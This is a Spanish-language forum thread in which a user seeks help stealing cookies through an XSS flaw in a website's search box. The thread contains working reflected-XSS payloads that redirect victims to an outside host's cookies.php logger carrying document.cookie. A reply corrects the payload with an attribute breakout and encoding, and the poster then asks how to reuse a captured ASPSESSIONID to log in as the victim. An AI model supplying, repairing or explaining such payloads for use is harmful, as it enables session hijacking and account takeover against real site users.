Buenas.
Queria pedir una pequeña ayuda con un bug de tipo XSS que encontre en una pagina,se encuentra en un buscador de la misma,una vez que subi el codigo del archivo que crea el log de las cookies en mi servidor (cookies.php) hice la url maligna poniendo:
http://www.xxxxx.com/search.php?cuadrodelbuscador=<script>window.location='http://miservidor.com/cookies.php?cookie='+document.cookie;</script>&nombredelboton=;
Esto de mede de crear un log en el server cuando alguien entre a la url maligna,y es asi el log se crea pero se crea vacio,no sale nada.
Para saber si una pagina es vulnerable crea a ver leido que debias escribir <script>alert(document.cookie);</script>
y si te salia un cartel de alerta es k es vulnerable.
Alguien me podria ayudar?
Gracias 

No se pueden poner datos de terceros.

http://????????????/buscar.asp?TxtFind="><script>window.location.href='http://raknis.freehostia.com/cookies.php?cookie='%2Bdocument.cookie;</script>&B1=;

Saludos!!

Gracias era el codigo que estaba mal 
Pero nada ahora nose muy bine lo que debo de hacer con lo de
ASPSESSIONIDQQTQABTB=xxxxxxxxxxxxxxxxxxxxxx
donde debo de meter estos valores? debo de arreglar mi cookie para logearme como este usuario? como lo hago o mejor donde encuentro esta info?
Gracias y no molesto mas